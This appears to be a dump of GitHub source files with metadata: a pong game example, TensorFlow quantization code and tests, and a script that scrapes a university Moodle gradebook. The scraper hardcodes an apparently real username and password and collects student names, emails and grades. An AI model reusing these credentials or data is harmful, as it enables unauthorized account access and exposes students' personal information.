"text": "'''\r\nCreated on 10/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nimport random\r\n\r\nfrom compy.entity import Entity\r\nfrom compy.component import Component\r\n\r\nimport ball\r\n\r\n\r\nclass BatPositionComponent( Component ):\r\n type = \"bat_position\"\r\n \r\n def __init__( self, name ):\r\n super( BatPositionComponent, self ).__init__(\r\n BatPositionComponent.type,\r\n name\r\n )\r\n\r\n def update( self ):\r\n # find the ball\r\n ball_entity = Entity.find_entity( \"ball\" )\r\n if ball == None:\r\n raise ValueError( \"No ball entity\" )\r\n\r\n # see if it's within our hit distance\r\n ball_position = ball_entity.data[ 'position' ]\r\n\r\n bat_position = self.entity.data[ 'position' ]\r\n hit_distance = self.entity.data[ 'hit_distance' ]\r\n max_distance = bat_position + hit_distance\r\n min_distance = bat_position - hit_distance\r\n\r\n if \\\r\n ball_position > max_distance or \\\r\n ball_position < min_distance:\r\n # ball is too far away\r\n # do nothing\r\n return\r\n\r\n # see if it's coming in our direction\r\n # simply compare velocity direction with bat\r\n # position and assume only 2 bats\r\n # not the best component but its just an example\r\n ball_velocity = ball_entity.data[ 'velocity' ]\r\n if \\\r\n ball_velocity < 0.0 and \\\r\n bat_position > 0.0:\r\n # heading away\r\n return\r\n if \\\r\n ball_velocity > 0.0 and \\\r\n bat_position < 0.0:\r\n # heading away\r\n return\r\n\r\n # hit it!\r\n bat_hit = self.entity.find_component(\r\n BatHitComponent.type\r\n )\r\n if bat_hit == None:\r\n raise ValueError( \"No bat hit component\" )\r\n\r\n # hit the ball\r\n bat_hit.hit_ball()\r\n\r\nclass BatHitComponent( Component ):\r\n type = \"bat_hit\"\r\n\r\n def __init__( self, name, sleep_time, hit_chance ):\r\n super( BatHitComponent, self ).__init__(\r\n BatHitComponent.type,\r\n name\r\n )\r\n\r\n self.sleep_time = sleep_time\r\n self.last_hit = 0\r\n self.hit_chance = hit_chance\r\n\r\n def hit_ball( self ):\r\n # see if we can hit yet\r\n if self.last_hit > 0:\r\n # we already tried to hit it\r\n # don't continue\r\n return\r\n\r\n # set our last hit to our sleep time\r\n # this stops us taking unlimited hits\r\n self.last_hit = self.sleep_time\r\n\r\n # roll a dice and see if we hit it or not\r\n chance = random.random()\r\n\r\n if chance > self.hit_chance:\r\n # we've missed\r\n print \"%s missed the ball!\" % self.entity.name\r\n return\r\n\r\n # find the ball\r\n ball_entity = Entity.find_entity( \"ball\" )\r\n if ball == None:\r\n raise ValueError( \"No ball entity\" )\r\n\r\n ball_contact = ball_entity.find_component(\r\n ball.BallContactComponent.type\r\n )\r\n if ball_contact == None:\r\n raise ValueError( \"No ball contact component\" )\r\n\r\n velocity = random.random()\r\n position = self.entity.data[ 'position' ]\r\n\r\n if position > 0.0:\r\n velocity *= -1.0\r\n\r\n ball_contact.hit( velocity )\r\n\r\n print \"%s hit the ball!\" %self.entity.name\r\n\r\n def update( self ):\r\n if self.last_hit > 0:\r\n self.last_hit -= 1\r\n\r\n\r\ndef create( name, position, hit_distance, hit_chance, sleep_time ):\r\n entity = Entity( name )\r\n entity.add_component(\r\n BatPositionComponent( 'position' )\r\n )\r\n entity.add_component(\r\n BatHitComponent(\r\n 'hit',\r\n sleep_time,\r\n hit_chance\r\n )\r\n )\r\n\r\n entity.data[ 'position' ] = position\r\n entity.data[ 'hit_distance' ] = hit_distance\r\n\r\n return entity\r\n\r\n"
},
{
"alpha_fraction": 0.6144578456878662,
"alphanum_fraction": 0.6423588991165161,
"avg_line_length": 18.19230842590332,
"blob_id": "faac73dac55ecc6aad4f56174d6b787de9660a11",
"content_id": "3e476674d2ffa5398c1c57f7e5d0330d2a870c9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 78,
"path": "/examples/pong/main.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 09/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nfrom compy.entity import Entity\r\n\r\nimport ball\r\nimport bat\r\nimport table\r\n\r\n\r\ngames_to_play = 10\r\ntable_size = 30.0\r\nplayer_positions = [ -10.0, 10.0 ]\r\nplayer_hit_distance = 1.0\r\nplayer_hit_chance = 0.8\r\nplayer_time_between_hits = 5\r\n\r\n# create the ball\r\nball_entity = ball.create()\r\n\r\n# create player 1\r\nbat_left = bat.create(\r\n \"Player 1\",\r\n player_positions[ 0 ],\r\n player_hit_distance,\r\n player_hit_chance,\r\n player_time_between_hits\r\n )\r\n\r\n# create player 2\r\nbat_right = bat.create(\r\n \"Player 2\",\r\n player_positions[ 1 ],\r\n player_hit_distance,\r\n player_hit_chance,\r\n player_time_between_hits\r\n )\r\n\r\n# create the table\r\ntable_entity = table.create( table_size / 2.0 )\r\n\r\n# begin playing\r\nprint \"Playing to %i\" % games_to_play\r\n\r\n# serve the ball\r\nball_contact = ball_entity.find_component(\r\n ball.BallContactComponent.type\r\n )\r\n\r\nif ball_contact == None:\r\n raise ValueError( \"No ball contact component\" )\r\n\r\n\r\nball_contact.serve()\r\n\r\n# keep playing until the game is over\r\nwhile True:\r\n Entity.update_entities()\r\n\r\n if table_entity.data[ 'games' ] >= games_to_play:\r\n break\r\n\r\n# print final score\r\nprint \"Final score\"\r\nplayer1_score = table_entity.data[ 'left_score' ]\r\nplayer2_score = table_entity.data[ 'right_score' ]\r\nprint \"Player 1: %i\" % player1_score\r\nprint \"Player 2: %i\" % player2_score\r\n\r\nif player1_score > player2_score:\r\n print \"Player 1 Wins!\"\r\nelif player1_score < player2_score:\r\n print \"Player 2 Wins!\"\r\nelse:\r\n print \"Tied game!\"\r\n\r\n"
},
{
"alpha_fraction": 0.5181347131729126,
"alphanum_fraction": 0.5261945724487305,
"avg_line_length": 21.76712417602539,
"blob_id": "bc7e73e41791b2bf4a5e0b91cf3c73e9ec50caab",
"content_id": "386a95b36e92060e8e75e0c8e14919fcfda4e171",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1737,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 73,
"path": "/examples/pong/table.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 10/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nimport random\r\n\r\nfrom compy.entity import Entity\r\nfrom compy.component import Component\r\n\r\nimport ball\r\n\r\n\r\nclass BallCheckComponent( Component ):\r\n type = \"ball_check\"\r\n \r\n def __init__( self, name, half_size ):\r\n super( BallCheckComponent, self ).__init__(\r\n BallCheckComponent.type,\r\n name\r\n )\r\n self.half_size = half_size\r\n\r\n def update( self ):\r\n # find the ball\r\n ball_entity = Entity.find_entity( \"ball\" )\r\n if ball == None:\r\n raise ValueError( \"No ball entity\" )\r\n\r\n # see if it's out of bounds\r\n ball_position = ball_entity.data[ 'position' ]\r\n\r\n if \\\r\n ball_position >= -self.half_size and \\\r\n ball_position <= self.half_size:\r\n # ball still in play\r\n return\r\n\r\n\r\n if ball_position < -self.half_size:\r\n # out of bounds\r\n print \"Ball out of bounds on left\"\r\n self.entity.data[ 'right_score' ] += 1\r\n\r\n if ball_position > self.half_size:\r\n # out of bounds\r\n print \"Ball out of bounds on right\"\r\n self.entity.data[ 'left_score' ] += 1\r\n\r\n self.entity.data[ 'games' ] += 1\r\n\r\n # serve the ball\r\n ball_contact = ball_entity.find_component(\r\n ball.BallContactComponent.type\r\n )\r\n ball_contact.serve()\r\n\r\n\r\n\r\n\r\n\r\ndef create( half_size ):\r\n entity = Entity( \"table\" )\r\n entity.add_component(\r\n BallCheckComponent( 'ball_check', half_size )\r\n )\r\n\r\n entity.data[ 'left_score' ] = 0\r\n entity.data[ 'right_score' ] = 0\r\n entity.data[ 'games' ] = 0\r\n\r\n return entity\r\n\r\n"
},
{
"alpha_fraction": 0.5077950954437256,
"alphanum_fraction": 0.5122494697570801,
"avg_line_length": 24.776119232177734,
"blob_id": "9285de25efaf86cbb97320ec9d7b72c9158fd899",
"content_id": "59c84ab571260f90a2699f720da64d5e9b59e8dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1796,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 67,
"path": "/compy/entity.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 09/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nimport weakref\r\n\r\nclass Entity( object ):\r\n entities = {}\r\n \r\n def __init__( self, name ):\r\n super( Entity, self ).__init__()\r\n\r\n self.name = name\r\n self.components = {}\r\n self.data = {}\r\n\r\n if name in Entity.entities:\r\n raise ValueError( \"Entity name must be unique\" )\r\n Entity.entities[ name ] = weakref.ref( self )\r\n\r\n def __del__( self ):\r\n del Entity.entities[ self.name ]\r\n\r\n @staticmethod\r\n def find_entity( name ):\r\n if name in Entity.entities:\r\n entity = Entity.entities[ name ]\r\n if entity == None:\r\n del Entity.entities[ name ]\r\n return None\r\n else:\r\n return entity()\r\n return None\r\n\r\n @staticmethod\r\n def update_entities():\r\n for entity in Entity.entities.values():\r\n if entity != None:\r\n entity().update()\r\n else:\r\n del Entity.entities[ name ]\r\n\r\n def add_component( self, component ):\r\n if component.type in self.components:\r\n raise ValueError(\r\n \"Component type already registered\"\r\n )\r\n else:\r\n component._set_entity( self )\r\n self.components[ component.type ] = component\r\n\r\n def remove_component( self, type ):\r\n component = self.components[ type ]\r\n component._set_entity( None )\r\n del self.components[ type ]\r\n\r\n def find_component( self, type ):\r\n if type in self.components:\r\n return self.components[ type ]\r\n else:\r\n return None\r\n\r\n def update( self ):\r\n for component in self.components.values():\r\n component.update()\r\n\r\n"
},
{
"alpha_fraction": 0.47138965129852295,
"alphanum_fraction": 0.4931880235671997,
"avg_line_length": 15.380952835083008,
"blob_id": "33504cf82c43b6efc90f5b9de39bcdab725cd1a9",
"content_id": "a51d5a0eef2d79e79f8bd5e49fd36dd349b12e1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 367,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 21,
"path": "/compy/component.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 09/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\n\r\nclass Component( object ):\r\n \r\n def __init__( self, type, name ):\r\n super( Component, self ).__init__()\r\n\r\n self.type = type\r\n self.name = name\r\n self.entity = None\r\n\r\n def _set_entity( self, entity ):\r\n self.entity = entity\r\n\r\n def update( self ):\r\n pass\r\n\r\n"
}
] | 6 |
akarmi/model-optimization
|
https://github.com/akarmi/model-optimization
|
2a53655e92cabe5b180a0319bc64c339494b97bb
|
2d3faaa361ecb3639f4a29da56e0e6ed52336318
|
b9ed14f23d7d48ce88a93a808556cab9a0abc682
|
refs/heads/master
| 2020-08-16T17:20:55.836218 | 2019-10-07T17:49:50 | 2019-10-07T17:50:12 | 215,530,733 | 0 | 0 |
Apache-2.0
| 2019-10-16T11:23:40 | 2019-10-16T11:20:48 | 2019-10-15T21:20:12 | null |
[
{
"alpha_fraction": 0.6786585450172424,
"alphanum_fraction": 0.6829268336296082,
"avg_line_length": 36.701148986816406,
"blob_id": "d196d17c1a6950c0cf78f140ab70831b47bf1269",
"content_id": "cd79b497bd839182df8cb6d949ade95dbaa5639c",
"detected_licenses": [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3280,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 87,
"path": "/tensorflow_model_optimization/python/core/quantization/keras/quantize_emulate.py",
"repo_name": "akarmi/model-optimization",
"src_encoding": "UTF-8",
"text": "# Copyright 2018 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Entry point for quantize emulation during training of models.\"\"\"\n\nfrom tensorflow.python import keras\n\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize_annotate as quant_annotate\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize_aware_activation\nfrom tensorflow_model_optimization.python.core.quantization.keras.quantize_emulate_wrapper import QuantizeEmulateWrapper\n\n\ndef QuantizeEmulate(to_quantize,\n num_bits,\n narrow_range=True,\n symmetric=True,\n **kwargs):\n \"\"\"Use this function to emulate quantization on NN layers during training.\n\n The function accepts a single layer or multiple layers and handles them\n appropriately.\n\n Arguments:\n to_quantize: A single keras layer, list of keras layers, or a\n `tf.keras.Sequential` model.\n num_bits: Number of bits for quantization\n narrow_range: Whether to use the narrow quantization range [1; 2^num_bits\n - 1] or wide range [0; 2^num_bits - 1].\n symmetric: If true, use symmetric quantization limits instead of training\n the minimum and maximum of each quantization range separately.\n **kwargs: Additional keyword arguments.\n\n Returns:\n Wrapped layer with quantization applied.\n \"\"\"\n\n def _QuantizeList(layers, **params):\n \"\"\"Apply QuantizeEmulate wrapper to a list of layers.\n\n Args:\n layers: List of keras layers to apply QuantizeEmulate.\n **params: QuantizationParams for the entire list.\n\n Returns:\n List of layers wrapped with QuantizeEmulate.\n \"\"\"\n wrapped_layers = []\n\n for layer in layers:\n # Already quantized. Simply use and return. This supports usage such as\n # model = QuantizeEmulate([\n # Dense(),\n # QuantizeEmulate(Dense(), layer_params)\n # Dense()\n # ], model_params)\n if isinstance(layer, QuantizeEmulateWrapper):\n wrapped_layers.append(layer)\n continue\n\n wrapped_layers.append(QuantizeEmulate(layer, **params))\n\n return wrapped_layers\n\n params = {\n 'num_bits': num_bits,\n 'narrow_range': narrow_range,\n 'symmetric': symmetric\n }\n params.update(kwargs)\n\n if isinstance(to_quantize, list):\n return _QuantizeList(to_quantize, **params)\n elif isinstance(to_quantize, keras.Sequential):\n return keras.models.Sequential(_QuantizeList(to_quantize.layers, **params))\n elif isinstance(to_quantize, keras.layers.Layer):\n return QuantizeEmulateWrapper(to_quantize, **params)\n"
},
{
"alpha_fraction": 0.6698536276817322,
"alphanum_fraction": 0.683896005153656,
"avg_line_length": 36.18888854980469,
"blob_id": "459e6f5e75f4d9dcde5864f61800624e80f40027",
"content_id": "6f5f91ea4d7f952eb905c720e0f6247e429f72af",
"detected_licenses": [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6694,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 180,
"path": "/tensorflow_model_optimization/python/core/quantization/keras/layers/conv_batchnorm_test.py",
"repo_name": "akarmi/model-optimization",
"src_encoding": "UTF-8",
"text": "# Copyright 2019 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"ConvBatchNorm layer tests.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tempfile\n\nimport numpy as np\nfrom six.moves import range\nimport tensorflow.compat.v1 as tf\n\nfrom tensorflow.python import keras\nfrom tensorflow.python.keras import activations\nfrom tensorflow.python.platform import test\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize\nfrom tensorflow_model_optimization.python.core.quantization.keras import utils\nfrom tensorflow_model_optimization.python.core.quantization.keras.layers import conv_batchnorm\n\n_ConvBatchNorm2D = conv_batchnorm._ConvBatchNorm2D\n\n\nclass ConvBatchNorm2DTest(test.TestCase):\n\n def setUp(self):\n super(ConvBatchNorm2DTest, self).setUp()\n self.batch_size = 8\n self.model_params = {\n 'filters': 2,\n 'kernel_size': (3, 3),\n 'input_shape': (10, 10, 3),\n 'batch_size': self.batch_size,\n }\n\n def _get_folded_batchnorm_model(self,\n is_quantized=False,\n post_bn_activation=None):\n return tf.keras.Sequential([\n _ConvBatchNorm2D(\n kernel_initializer=keras.initializers.glorot_uniform(seed=0),\n is_quantized=is_quantized,\n post_activation=post_bn_activation,\n **self.model_params)\n ])\n\n @staticmethod\n def _compute_quantization_params(model):\n # TODO(alanchiao): remove this once the converter for training-time\n # quantization supports producing a TFLite model with a float output.\n #\n # Derived from Nudge function in\n # tensorflow/core/kernels/fake_quant_ops_functor.h.\n min_val = keras.backend.eval(\n model.layers[0].post_activation._min_post_activation)\n max_val = keras.backend.eval(\n model.layers[0].post_activation._max_post_activation)\n quant_min_float = 0\n quant_max_float = 255\n\n scale = (max_val - min_val) / (quant_max_float - quant_min_float)\n zero_point = round(quant_min_float - min_val / scale)\n\n return scale, zero_point\n\n def _test_equivalent_to_tflite(self, model, is_tflite_quantized=False):\n _, keras_file = tempfile.mkstemp('.h5')\n _, tflite_file = tempfile.mkstemp('.tflite')\n\n model.compile(\n loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\n\n model.fit(\n np.random.uniform(0, 1, size=[self.batch_size, 10, 10, 3]),\n np.random.uniform(0, 10, size=[self.batch_size, 8, 8, 2]),\n epochs=1,\n callbacks=[])\n\n # Prepare for inference.\n inp = np.random.uniform(0, 1, size=[self.batch_size, 10, 10, 3])\n inp = inp.astype(np.float32)\n\n # TensorFlow inference.\n tf_out = model.predict(inp)\n\n if is_tflite_quantized:\n scale, zero_point = self._compute_quantization_params(model)\n\n # TFLite input needs to be quantized.\n inp = inp * 255\n inp = inp.astype(np.uint8)\n\n # TensorFlow Lite inference.\n tf.keras.models.save_model(model, keras_file)\n with quantize.quantize_scope():\n utils.convert_keras_to_tflite(\n keras_file,\n tflite_file,\n custom_objects={'_ConvBatchNorm2D': _ConvBatchNorm2D},\n is_quantized=is_tflite_quantized)\n\n interpreter = tf.lite.Interpreter(model_path=tflite_file)\n interpreter.allocate_tensors()\n input_index = interpreter.get_input_details()[0]['index']\n output_index = interpreter.get_output_details()[0]['index']\n\n interpreter.set_tensor(input_index, inp)\n interpreter.invoke()\n tflite_out = interpreter.get_tensor(output_index)\n\n if is_tflite_quantized:\n # dequantize outputs\n tflite_out = [scale * (x - zero_point) for x in tflite_out]\n # Off by 1 in quantized output. Notably we cannot reduce this. There is\n # an existing mismatch between TensorFlow and TFLite (from\n # contrib.quantize days).\n self.assertAllClose(tf_out, tflite_out, atol=scale)\n else:\n # Taken from testFoldFusedBatchNorms from\n # https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/tools/optimize_for_inference_test.py#L230\n self.assertAllClose(tf_out, tflite_out, rtol=1e-04, atol=1e-06)\n\n def testEquivalentToNonFoldedBatchNorm(self):\n folded_model = self._get_folded_batchnorm_model(is_quantized=False)\n\n non_folded_model = tf.keras.Sequential([\n keras.layers.Conv2D(\n kernel_initializer=keras.initializers.glorot_uniform(seed=0),\n use_bias=False,\n **self.model_params),\n keras.layers.BatchNormalization(axis=-1),\n ])\n\n for _ in range(2):\n inp = np.random.uniform(0, 10, size=[1, 10, 10, 3])\n folded_out = folded_model.predict(inp)\n non_folded_out = non_folded_model.predict(inp)\n\n # Taken from testFoldFusedBatchNorms from\n # https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/tools/optimize_for_inference_test.py#L230\n self.assertAllClose(folded_out, non_folded_out, rtol=1e-04, atol=1e-06)\n\n def testEquivalentToFloatTFLite(self):\n model = self._get_folded_batchnorm_model(is_quantized=False)\n self._test_equivalent_to_tflite(model)\n\n def testQuantizedEquivalentToFloatTFLite(self):\n model = self._get_folded_batchnorm_model(is_quantized=True)\n self._test_equivalent_to_tflite(model)\n\n def testQuantizedWithReLUEquivalentToFloatTFLite(self):\n model = self._get_folded_batchnorm_model(\n is_quantized=True, post_bn_activation=activations.get('relu'))\n self._test_equivalent_to_tflite(model)\n\n def testQuantizedWithSoftmaxEquivalentToFloatTfLite(self):\n model = self._get_folded_batchnorm_model(\n is_quantized=True, post_bn_activation=activations.get('softmax'))\n self._test_equivalent_to_tflite(model)\n\n def testQuantizedEquivalentToQuantizedTFLite(self):\n model = self._get_folded_batchnorm_model(is_quantized=True)\n self._test_equivalent_to_tflite(model, is_tflite_quantized=True)\n\n\nif __name__ == '__main__':\n test.main()\n"
},
{
"alpha_fraction": 0.7036872506141663,
"alphanum_fraction": 0.7143491506576538,
"avg_line_length": 34.730159759521484,
"blob_id": "185600e3b7b97f53f6e17a9cac9f4e340b3bf9e0",
"content_id": "4c6af4917f8ffbcbb159060d69129e51a31e9c8a",
"detected_licenses": [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2251,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 63,
"path": "/tensorflow_model_optimization/python/core/quantization/keras/quantize_emulate_test.py",
"repo_name": "akarmi/model-optimization",
"src_encoding": "UTF-8",
"text": "# Copyright 2019 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for quantize API functions.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\nfrom tensorflow.python import keras\nfrom tensorflow.python.platform import test\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize_emulate\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize_emulate_wrapper\n\nQuantizeEmulate = quantize_emulate.QuantizeEmulate\nQuantizeEmulateWrapper = quantize_emulate_wrapper.QuantizeEmulateWrapper\n\n\nclass QuantizeEmulateTest(test.TestCase):\n\n def setUp(self):\n self.conv_layer = keras.layers.Conv2D(32, 4, input_shape=(28, 28, 1))\n self.dense_layer = keras.layers.Dense(10)\n self.params = {'num_bits': 8}\n\n def _assert_quant_model(self, model_layers):\n self.assertIsInstance(model_layers[0], QuantizeEmulateWrapper)\n self.assertIsInstance(model_layers[1], QuantizeEmulateWrapper)\n\n self.assertEqual(model_layers[0].layer, self.conv_layer)\n self.assertEqual(model_layers[1].layer, self.dense_layer)\n\n def testQuantizeEmulateSequential(self):\n model = keras.models.Sequential([\n self.conv_layer,\n self.dense_layer\n ])\n\n quant_model = QuantizeEmulate(model, **self.params)\n\n self._assert_quant_model(quant_model.layers)\n\n def testQuantizeEmulateList(self):\n quant_layers = QuantizeEmulate([self.conv_layer, self.dense_layer],\n **self.params)\n\n self._assert_quant_model(quant_layers)\n\n\nif __name__ == '__main__':\n test.main()\n"
}
] | 3 |
RishavPathak/Leethcode
|
https://github.com/RishavPathak/Leethcode
|
84a826744067c97d382ddab89c2a1c1fb59bc6a8
|
397e93c71d1bdead8355226bd13a5f249955eeab
|
6e545269c1ec576e9c800b8d4a7de9bfee7ff8cc
|
refs/heads/master
| 2020-07-17T02:04:15.368743 | 2019-09-02T20:45:06 | 2019-09-02T20:45:06 | 205,918,325 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7074829936027527,
"avg_line_length": 34.75,
"blob_id": "473e797c5e8e6678148cb4b1b89f1f7b9b157346",
"content_id": "3394019d99fdd4f4705c8b1e669e977439f33f0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 4,
"path": "/Replace.py",
"repo_name": "RishavPathak/Leethcode",
"src_encoding": "UTF-8",
"text": "String=input(\"Enter a String : \")\r\nSub_String=input(\"Replace: \")\r\nSub_String1=input(\"Replaced with : \")\r\ns=String.replace(Sub_String,Sub_String1)\r\n"
}
] | 1 |
diegolanu89/ParserNotas
|
https://github.com/diegolanu89/ParserNotas
|
9cdd8f39de1f127e90441307c6583a2a2038c225
|
72d6623d1714e534071c4a809cba38051b3f9a09
|
0495446c96846f72e95bcbbb23b367983f41308d
|
refs/heads/master
| 2020-03-18T13:03:55.666390 | 2018-08-17T19:54:13 | 2018-08-17T19:54:13 | 134,757,247 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.7200000286102295,
"avg_line_length": 17.75,
"blob_id": "a3bc702b013ade18919a4fcbdb6e10b0e7963ebd",
"content_id": "0dc75bab044911aeefb57ce6ccae2c87de1f9a50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 8,
"path": "/Parser/main.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "from Parser.parserNotas import Person\n\n\n\npeople1 = Person(\"male\",\"Jose Manuel\")\npeople2 = Person (\"female\", \"Ana\")\npeople1.display(33)\npeople2.display(22)\n"
},
{
"alpha_fraction": 0.6671408414840698,
"alphanum_fraction": 0.6955903172492981,
"avg_line_length": 24.545454025268555,
"blob_id": "78b67b649d697a25a2b30549abecad44b4e5a9b4",
"content_id": "48deec6879ea850205395a3289b0e9cf0b7d88f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1406,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 55,
"path": "/samples/parserNotas.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "from requests import session\nfrom bs4 import BeautifulSoup\nimport os, sys, itertools, re\nimport urllib\nimport lxml\nimport configparser\nimport datetime\nimport pandas as pd\nimport tensorflow as tf\n\nbaseurl = 'http://campus.fi.uba.ar/'\n\nauthdata = {\n 'action': 'login',\n 'username': '34417934',\n 'password': 'Orobasotawas89'\n }\nwith session() as ses:\n r = ses.post(baseurl + 'login/index.php', data=authdata)\nr = ses.get('http://campus.fi.uba.ar/grade/report/grader/index.php?id=382')\n\nsoup = BeautifulSoup(r.text,'html.parser')\ntable= soup.find('table',{'class':'gradereport-grader-table'})\n\ntable_body = table.find('tbody')\nrows = table.find_all('tr')\ndata = []\n\nfor row in rows:\n cols = row.find_all(['th','td'])\n cols = [ele.text.strip() for ele in cols]\n data.append([ele for ele in cols if ele]) \n\nalumnos = pd.DataFrame(data=data)\n\nprint (alumnos)\n#Solo parcial A\nalumnos = alumnos[alumnos.columns[0:3]]\n\nnotasA = alumnos[alumnos.columns[2]]\nfiltroNotasA = notasA.iloc[3:63]\n\nalumnosfiltro = alumnos.iloc[3:63, 0:3]\nalumnosfiltro.columns=['Nombre','Email','NotaParcialA']\n\nprint (alumnosfiltro)\nprint (filtroNotasA)\n\nfiltroNotasA.to_csv('NotaS.CSV')\n#print (alumnos[alumnos[2]=='I'])\n\nnumpyMatrix = filtroNotasA.as_matrix()\n\ndataVar_tensor = tf.constant(numpyMatrix, dtype = tf.float32, shape=[15780,9])\ndepth_tensor = tf.constant(depth, 'float32',shape=[15780,1])\n\n"
},
{
"alpha_fraction": 0.5888888835906982,
"alphanum_fraction": 0.5962963104248047,
"avg_line_length": 19.769229888916016,
"blob_id": "b761fdd041d4ab83ceea28d26c63b00a89a94110",
"content_id": "c7bc6d4ba8121958bee3b29d34ad94c00aff47ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/setup.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\nsetup(name='Parser_Notas',\n version='1.0',\n description='Parser de Notas del Campus',\n author='Diego Peyrano',\n author_email='[email protected]',\n license='free',\n packages=['Parser'],\n scripts=[\n 'bin/ejecutar.py',\n ],\n )\n"
},
{
"alpha_fraction": 0.5759360790252686,
"alphanum_fraction": 0.5881363153457642,
"avg_line_length": 31.561643600463867,
"blob_id": "ebfa494d502d444c2d82462d8ac361081ddb2c2d",
"content_id": "3bc2fe791a15e26d05ec6c6e6544838b7087a92d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2377,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 73,
"path": "/Parser/parserNotas.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
